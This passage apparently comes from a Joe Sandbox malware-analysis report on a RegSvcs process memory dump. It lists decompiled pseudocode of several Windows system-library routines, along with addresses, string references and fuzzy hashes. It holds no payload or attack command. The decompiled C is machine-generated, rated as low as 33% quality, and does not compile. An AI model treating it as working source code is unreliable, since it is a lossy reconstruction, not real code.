				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00FF9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00FD4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00FF9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01033893
0x01033896
0x01033899
0x0103389f
0x010338a0
0x010338a4
0x010338a9
0x010338ac
0x010338ad
0x010338ae
0x010338af
0x010338b1
0x010338b4
0x010338bb
0x010338bc
0x010338bd
0x010338c4
0x010338c8
0x010338ca
0x010338ca
0x010338d5
0x0103393e
0x01033940
0x01033942
0x01033952
0x01033954
0x01033961
0x01033961
0x01033967
0x0103396e
0x0103396e
0x01033947
0x0103394c
0x00000000
0x0103394c
0x010338ea
0x010338ee
0x010338f8
0x010338f9
0x010338ff
0x01033900
0x01033902
0x01033903
0x0103390b
0x0103390f
0x01033950
0x00000000
0x01033950
0x01033915
0x0103391d
0x0103391d
0x01033922
0x01033926
0x00000000
0x01033928
0x0103392b
0x0103392b
0x01033935
0x01033937
0x01033937
0x00000000
0x01033935
0x01033926
0x010338f0
0x00000000

Strings

BinaryName, xrefs: 010338B4

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 33c55cb71ac2b96138214d99a9bfd8ce4c18bb1a0a9a9e1476251bdf0f70d9c3
Instruction ID: 16d4b0af098470a942dac392c05dc952f51ac3ec8d6f2464a855e78598998c46
Opcode Fuzzy Hash: 33c55cb71ac2b96138214d99a9bfd8ce4c18bb1a0a9a9e1476251bdf0f70d9c3
Instruction Fuzzy Hash: 6A31F632900509EFEB15DA58C985E7FF7B8FB80B20F01416AA944AB251D7319E00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FED294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00FED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x10ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00FD4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00FFB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00FF98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00FF95D0();
					L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x00fed29c
0x00fed2a6
0x00fed2b1
0x00fed2b5
0x00fed2b6
0x00fed2bc
0x00fed2bd
0x00fed2be
0x00fed2bf
0x00fed2c2
0x00fed2c4
0x00fed2cc
0x00fed384
0x00fed34b
0x00fed34f
0x00fed350
0x00fed351
0x00fed35c
0x00fed35c
0x00fed2d6
0x00fed2da
0x00fed2e1
0x00fed361
0x00fed369
0x00fed36d
0x00fed2e3
0x00fed2e3
0x00fed2e3
0x00fed2e5
0x00fed2ed
0x00fed2f5
0x00fed2fa
0x00fed302
0x00fed303
0x00fed30b
0x00fed30f
0x00fed313
0x00fed318
0x00fed31c
0x00fed320
0x00fed379
0x00fed37d
0x00000000
0x00000000
0x0102affe
0x0102b001
0x0102b011
0x00000000
0x00fed322
0x00fed322
0x00fed330
0x00fed337
0x00fed35d
0x00fed339
0x00fed33f
0x00fed38c
0x00fed38c
0x00fed33f
0x00fed349
0x00000000
0x00fed349

Strings

@, xrefs: 00FED303

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 3d9132cc30e065ca2621660172dc3d71f7d23a89663db5e9a19c2411ca920f93
Instruction ID: e7ad83af3c01c767a51d22977c33a8623ebb27f4db2160aea127dcb00cbff4fa
Opcode Fuzzy Hash: 3d9132cc30e065ca2621660172dc3d71f7d23a89663db5e9a19c2411ca920f93
Instruction Fuzzy Hash: FA31D1B25083859FC321DF29C981A6BBBE8EF85754F04092EF994C3A50E635DD04EB93

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00FC1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00FFBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00FFA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00FFA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00FD4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x00fc1b8f
0x00fc1b9a
0x00fc1b9c
0x00fc1b9e
0x00fc1ba3
0x01017010
0x01017010
0x00000000
0x00fc1ba9
0x00fc1ba9
0x00fc1bae
0x00000000
0x00fc1bc5
0x00fc1bca
0x00fc1bcf
0x00fc1bd0
0x00fc1bd1
0x00fc1bd2
0x00fc1bd6
0x00fc1bdc
0x00fc1be0
0x01016ffc
0x01017000
0x00000000
0x01017006
0x01017009
0x01017009
0x00fc1be6
0x00fc1bec
0x00fc1c0b
0x00fc1c0b
0x00fc1c0c
0x00fc1c11
0x00fc1c12
0x00fc1c15
0x00fc1c1b
0x00fc1c1f
0x00fc1c31
0x00fc1c33
0x01017026
0x01017026
0x00fc1c21
0x00fc1c24
0x00fc1c24
0x00fc1bee
0x00fc1bee
0x00fc1bf2
0x00fc1c3a
0x00fc1bf4
0x00fc1bf4
0x00fc1c05
0x00fc1c05
0x00fc1c09
0x00fc1c3e
0x00000000
0x00000000
0x00000000
0x00fc1c09
0x00fc1bec
0x00fc1be0
0x00fc1bae
0x00fc1c2e

Strings

WindowsExcludedProcs, xrefs: 00FC1BC5

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: a289ac830d7c8d73c6a5123161e92fb7b03346a8f39a480d795bd97dc75de1ec
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 49212B77A40219ABDB22DA59C941FEBB7ADBF82760F150469FA048B201D634DD11F7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FDF716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FDF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x00fdf71d
0x00fdf722
0x00fdf726
0x01024770
0x00fdf765
0x00fdf769
0x00fdf769
0x00fdf732
0x0102477a
0x00000000
0x0102477a
0x00fdf738
0x00fdf73a
0x00fdf73c
0x00fdf73f
0x00fdf746
0x00fdf778
0x00fdf7a9
0x00fdf7a9
0x00fdf754
0x00fdf75a
0x00fdf75d
0x00fdf75f
0x00fdf761
0x00fdf76f
0x00fdf771
0x00fdf771
0x00fdf76f
0x00fdf763
0x00000000
0x00fdf763
0x00fdf77d
0x00fdf7a3
0x00fdf7a5
0x00000000
0x00fdf7a5
0x00fdf77f
0x00fdf782
0x00fdf784
0x00fdf786
0x00000000
0x00000000
0x00000000
0x00fdf788
0x00fdf748
0x00fdf74d
0x00fdf78d
0x00fdf793
0x00fdf7b7
0x00fdf7bc
0x00000000
0x00fdf7bc
0x00fdf798
0x00000000
0x00000000
0x00fdf79d
0x00fdf7b0
0x00000000
0x00fdf7b0
0x00fdf79f
0x00000000
0x00fdf74f
0x00fdf74f
0x00000000
0x00fdf74f

Strings

Actx , xrefs: 00FDF73F

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 311310c906f83b689e4d3ebcbe9907dd7a2419cfb434a79a8a8d3006cf899c6f
Instruction ID: 032208adba1496a5157ad8fdc23fabee099217ebc464a2036a8e8cc460863705
Opcode Fuzzy Hash: 311310c906f83b689e4d3ebcbe9907dd7a2419cfb434a79a8a8d3006cf899c6f
Instruction Fuzzy Hash: 4E119036B046428BEB654E1D8890FB67297AB95734F3C453BE467CB391DA70CC49B740

Uniqueness

Uniqueness Score: -1.00%

Function 01068DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01068DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1090d50);
				E0100D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01045720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E0100DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E0100DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0100D130(_t34, _t39, _t40);
			}

0x01068df1
0x01068df1
0x01068df1
0x01068df1
0x01068df1
0x01068df1
0x01068df3
0x01068df8
0x01068dfd
0x01068e00
0x01068e0e
0x01068e2a
0x01068e36
0x01068e38
0x01068e3c
0x01068e46
0x01068e46
0x01068e36
0x01068e50
0x01068e56
0x01068e59
0x01068e5c
0x01068e60
0x01068e67
0x01068e6d
0x01068e73
0x01068e74
0x01068eb1
0x01068ebd

Strings

Critical error detected %lx, xrefs: 01068E21

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 8039cdf30511ee116d06afb1455f8d17b4646fc612b9931dd1ca02ebadec5961
Instruction ID: 17a3f21e6ccb3789e98d20e0f7d58e579e92b03f9ef8ea4e6951110172cf3913
Opcode Fuzzy Hash: 8039cdf30511ee116d06afb1455f8d17b4646fc612b9931dd1ca02ebadec5961
Instruction Fuzzy Hash: 3D1127B5D15348DAEB25DFE889057DCBBB4AB14314F20826EE5A96B282C2344601CF14

Uniqueness

Uniqueness Score: -1.00%

Function 01085BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01085BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1091178);
				E0100D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01084C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00FFD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01085542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x10a60e8;
								if( *0x10a60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x10a60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E00FF9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E00FF6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E00FFF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
